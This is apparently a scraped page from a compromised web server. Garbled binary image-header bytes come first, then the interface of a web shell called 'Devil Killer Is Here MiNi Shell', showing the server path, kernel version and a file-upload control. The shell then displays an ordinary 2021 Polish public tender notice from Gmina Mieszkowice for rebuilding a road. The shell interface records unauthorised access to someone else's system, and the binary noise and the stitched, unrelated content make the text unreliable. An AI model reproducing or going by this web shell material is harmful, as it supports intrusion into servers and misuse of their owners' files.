JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210701/0010149101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00101491 z dnia 2021-07-01</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa odcinka drogi gminnej w miejscowości Kępa Troszyńska </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Mieszkowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 811686544</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fryderyka Chopina 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mieszkowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-505</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">914666900</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">914145031</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@mieszkowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">bip.mieszkowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa odcinka drogi gminnej w miejscowości Kępa Troszyńska </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c7fd76c4-da5e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00101491</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-01</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> bip.mieszkowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu oudzielenie<br/>zamówienia komunikacja między zamawiającym a wykonawcami odbywa się przy<br/>życiu:miniPortalu,który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,ePUAPu,<br/>dostępnegopodadresem:https://epuap.gov.pl/wps/portalESP: URZĄD MIEJSKI W MIESZKOWICACH,<br/>74-505Mieszkowice, ul. Fryderyka Chopina 1 , /ji3m439kt4/SkrytkaESP oraz<br/>pocztyelektronicznejgp.srodowisko@mieszkowice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Złożenieoferty jest możliwe wyłącznie poprzez ePUAP przy użyciu systemu miniPortal.Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musiposiadać<br/>kontona ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następującychformularzy:<br/>„Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza<br/>dokomunikacji”.Wymagania techniczne i organizacyjne wysyłania i odbieraniadokumentów<br/>elektronicznych,elektronicznych kopii dokumentów i oświadczeń oraz informacjiprzekazywanych<br/>przyich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal orazWarunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Instrukcjedotyczące<br/>korzystania z systemu miniPortal – ePUAP, dostępna jest<br/>podadresem:https://miniportal.uzp.gov.pl/Instrukcje,natomiast Regulamin korzystania z systemu<br/>miniPortaldostępny jest pod adresem:https://miniportal.uzp.gov.pl/Warunki Uslugi. Maksymalny<br/>rozmiarplików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia,<br/>zmiany,wycofania oferty lub wniosku”i „Formularza do komunikacji” wynosi 150 MB. Natomiast,<br/>maksymalnyrozmiar wiadomości wysyłanych / odbieranych przez zamawiającego poprzez e-mail<br/>wynosi: 50 MB. Zadatę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych,<br/>oświadczeńlub elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się<br/>datęich przekazania na ePUAP.Zamawiający przekazuje link do postępowania wszczętego<br/>naplatformie miniPortal oraz ID postępowania jako załącznik nr 10 do niniejszej SWZ. Dane<br/>postępowaniemożnawyszukać również na Liście wszystkich postępowań w miniPortalu klikając<br/>wcześniej opcję„DlaWykonawców” lub ze strony głównej z zakładki Postępowania.Wymagania<br/>techniczne: Wcelu korzystania z systemu miniPortal konieczne jest dysponowanie przez<br/>użytkownikaurządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na<br/>Platformie Windows,Mac i Linux.Specyfikacja połączenia, formatu przesyłanych danych oraz<br/>kodowania i oznaczania czasuodbiorudanych:specyfikacja połączenia - Formularze udostępnione są<br/>za pomocą protokołuTLS1.2,format danych oraz kodowanie miniPortal - Formularze dostępne są w<br/>formacie HTMLzkodowaniemUTF-8, oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje<br/>opierają sięoczas serwera idane zapisywane są z dokładnością co do setnej części sekundy, integracja<br/>zsystememePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP.<br/>WprzypadkuWykonawcy wysyłającego wniosek do Zamawiającego, ESP<br/>Zamawiającegoautomatyczniegeneruje Rodzaj Urzędowego Poświadczenia Odbioru czyli Urzędowe<br/>PoświadczeniePrzedłożenia(UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji<br/>„Dane poświadczenia" jest zawarta informacja o dacie doręczenia.System dostępny jest za<br/>pośrednictwem następującychprzeglądarek internetowych: Microsoft Internet Explorer od wersji<br/>11.0Mozilla Firefox od wersji 15Google Chrome od wersji 20 Microsoft Edge Dodatkowe wymagania<br/>dotyczące korespondencji: Przyprzekazywaniu korespondencji przy użyciu środków komunikacji<br/>elektronicznej, wykonawca zapewniagotowość odbioru i odczytania co najmniej plików w formacie<br/>*.pdf. W przypadku kompresjiplików,zamawiający wskazuje format z rozszerzeniem .zip, lub .7Z, które<br/>widnieją w załączniku nr 2 doRozporządzenia KRI [5]. Zamawiający dopuszcza również format .rar3.<br/>Zamawiający wskazuje formatydanych, w szczególności wśród wskazanych w Rozporządzeniu KRI [5],<br/>w jakich wykonawca powinienzłożyć ofertę oraz pozostałe wymagane oświadczenia i dokumenty: *.pdf,<br/>*.jpg (.jpeg), *.doc,*.docx,*.odt, *.ods, *.txt, lub *.xls ze szczególnym wskazaniem na .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z rozdziałem XXXII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z rozdziałem XXXII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GP.271.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres zamówienia obejmuje m.in.:<br/>Wykonanie koryta pod warstwy konstrukcyjne, oczyszczenie istniejącej nawierzchni brukowej, wyrównanie istniejącej nawierzchni brukowej, podbudowa z kruszywa łamanego 20cm, nawierzchnia z betonu asfaltowego, wykonanie rowu chłonnego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wysokość kary umownej za każdy dzień opóźnienia w realizacji przedmiotu umowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 112 ust. 1 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu<br/>wsposób proporcjonalny do przedmiotu zamówienia oraz umożliwiający ocenę zdolnościOgłoszenie nr z dniaBiuletyn Zamówień Publicznych Ogłoszenie o zamówieniu -<br/>Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty<br/>budowlanewykonawcy do należytego wykonania zamówienia, w szczególności wyrażając je jako<br/>minimalnepoziomy zdolności.2.W związku z powyższym, o udzielenie zamówienia publicznego<br/>mogąubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu<br/>dotyczące:1)zdolnościtechnicznej lub zawodowej: zamawiający uzna, że wykonawca spełnia<br/>niniejszy warunekwówczas, jeżeli wykaże, żea)dysponuje osobami zdolnymi do wykonania<br/>zamówienia:Kierownikbudowy: Wymagane kwalifikacje: uprawnienia budowlane do kierowania<br/>robotami budowlanymiw specjalności drogowej, Wymagane doświadczenie zawodowe: nie mniej<br/>niż 3-letniedoświadczenie zawodowe na stanowisku kierownika budowy, liczone od dnia<br/>uzyskaniauprawnień budowlanych.W celu uniknięcia wątpliwości zaleca się podanie daty<br/>wydaniauprawnień i dokładne cytowanie zakresu uprawnień z posiadanego<br/>zaświadczenia.Doświadczenie zawodowebędzie liczone od daty otrzymania uprawnień. Przez<br/>uprawnieniabudowlane należy rozumieć: uprawnienia, o których mowa w ustawie z dnia 7 lipca<br/>1994 r.Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) lub odpowiadające im ważne<br/>uprawnieniabudowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub<br/>odpowiedniekwalifikacje zdobyte za granicą, uznane w Polsce na podstawie przepisów ustawy z<br/>dnia 22grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwachczłonkowskich Unii Europejskiej(Dz.U. z 2020 r. poz. 1333 ze zm.)b) wykonał<br/>należycie wokresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzeniadziałalności jest krótszy – w tym okresie, minimum:dwie roboty budowlane o<br/>wartości niemniejszej niż 100.000,00 zł brutto każda, polegające na wykonaniu budowy lub<br/>przebudowydrogi.Ocena spełniania warunku nastąpi na podstawie wykazu robót budowlanych<br/>wykonanychnie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności<br/>jest krótszy -w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów,na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy teroboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, sąreferencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlanezostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jest w stanieuzyskać tych dokumentów -inne odpowiednie dokumenty.2) sytuacji ekonomicznej<br/>lubfinansowej: zamawiający uzna, że wykonawca spełnia niniejszy warunek wówczas,jeżeliwykaże, żea)zamawiający uzna, że wykonawca znajduje się w sytuacji ekonomicznej<br/>lubfinansowej zapewniającej należyte wykonanie zamówienia, jeżeli wykonawca wykaże,<br/>żeposiada środki finansowe lub zdolność kredytową w wysokości nie niższej niż 100.000,00<br/>zł;3.Wymogi dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>określoneprzez zamawiającego, zgodnie z art. 117 ust. 1-4 ustawy Pzp:1) W odniesieniu do<br/>warunkówdotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy<br/>wspólnieubiegający się o udzielenie zamówienia, mogą polegać na zdolnościach tych z<br/>wykonawców,którzy wykonają roboty budowlane do realizacji których te zdolności są<br/>wymagane.2) Wodniesieniu do warunków dotyczących zdolności ekonomicznej lub finansowej<br/>wykonawcywspólnie ubiegający się o udzielenie zamówienia, mogą polegać na<br/>zdolnościachekonomicznych lub finansowych jednego z wykonawców2) W przypadku, o którym<br/>mowa w pkt1) i 2), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>ofertyoświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, zgodnie<br/>zewzorem stanowiącym załącznik nr 1 do SWZ.4. Zgodnie z art. 118 ust. 1 ustawy<br/>Pzp,wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>wstosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części,<br/>polegaćna zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub<br/>ekonomicznejpodmiotów udostępniających zasoby, niezależnie od charakteru prawnego<br/>łączących go z nimistosunków prawnych, przy czym, w odniesieniu do warunków dotyczących<br/>wykształcenia,kwalifikacji zawodowych lub doświadczenia, wykonawcy mogą polegać na<br/>zdolnościachpodmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty budowlane<br/>lub usługi,do realizacji których te zdolności są wymagane.Na podstawie art. 120 ustawy Pzp,<br/>podmiot,który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z wykonawcą,którypolega na jego sytuacji finansowej lub ekonomicznej, za szkodę poniesioną<br/>przezzamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za<br/>nieudostępnienie zasobów podmiot ten nie ponosi winy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz osób, skierowanych przez wykonawcę do realizacji<br/>zamówieniapublicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub<br/>kierowanierobotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień,doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresuwykonywanych przez nie czynności orazinformacją o podstawie do dysponowania tymi<br/>osobami - wzórstanowi załącznik nr 4 do SWZb) wykaz robót budowlanych wykonanych nie wcześniej<br/>niż w okresieostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniemich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostaływykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonanenależycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzoneprzez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca<br/>z przyczynniezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie<br/>dokumenty wzórstanowi załącznik nr 3 do SWZc) informacja z banku lub spółdzielczej kasy<br/>oszczędnościowo –kredytowej potwierdzająca wysokość posiadanych środków finansowych lub<br/>zdolność kredytowąwykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu<br/>składania ofert</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WYKAZ DOKUMENTÓW SKŁADAJĄCYCH SIĘ NA OFERTĘ:1) formularz ofertowy – zgodnieze<br/>wzorem stanowiącym załącznik nr 1 do SWZ;2) oświadczenie wykonawcy wskazujące<br/>częścizamówienia, których wykonanie zamierza powierzyć podwykonawcom, wraz z podaniem<br/>nazwewentualnych podwykonawców, jeżeli są już znani – zgodnie ze wzorem stanowiącym<br/>załączniknr 1 do SWZ;3) oświadczenie wykonawcy składane na podstawie art. 117 ust. 4ustawy<br/>Pzp (wprzypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia) –zgodnie<br/>zewzorem stanowiącym załącznik nr 1 do SWZ;4) oświadczenie, o którym mowa w art.125 ust.<br/>1,składane na podstawie art. 273 ust. 2 ustawy Pzp, zgodnie ze wzorem stanowiącym<br/>załączniknr2 do SWZ, w następującym zakresie:• spełniania warunków udziału w<br/>postępowaniuokreślonych przez zamawiającego w rozdziale XVI ust. 2 pkt 1) SWZ,• wstępnego<br/>potwierdzeniabraku podstaw wykluczenia z postępowania na podstawie art. 108 ust. 1 oraz art.<br/>109 ust. 1pkt4) i 5) ustawy Pzp;5) Odpowiednie pełnomocnictwo lub inne dokumenty<br/>potwierdzająceumocowaniedo reprezentowania wykonawcy, gdy w imieniu wykonawcy działa<br/>osoba, którejumocowanie nie wynika z dokumentów takich jak odpis lub informacja z KRS,<br/>CEiDG, lubinnego właściwego rejestru, z zastrzeżeniem § 13 ust. 1 i 2 Rozporządzenia o<br/>rodzajachdokumentów [2]. Powyższe ma zastosowanie również do osoby działającej w<br/>imieniuwykonawców wspólnie ubiegających się o udzielenie zamówienia.6) zobowiązanie<br/>podmiotuudostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów<br/>napotrzeby realizacji danego zamówienia lub inny podmiotowy środek<br/>dowodowypotwierdzający,że wykonawca realizując zamówienie,będzie dysponował<br/>niezbędnymi zasobamitych podmiotów, jeżeli wykonawca w celu potwierdzenia spełniania<br/>warunków udziału wpostępowaniu, zamierza polegać na zdolnościach innych podmiotów. Wzór<br/>dokumentu stanowizałącznik nr 5 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga od wykonawców wniesienia wadium w wysokości 4 000,00 zł (słownie: cztery tysiące złotych).<br/>2. Wadium wnosi się przed upływem terminu składania ofert, tj. 16.07.2021 godz. 09:00 i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 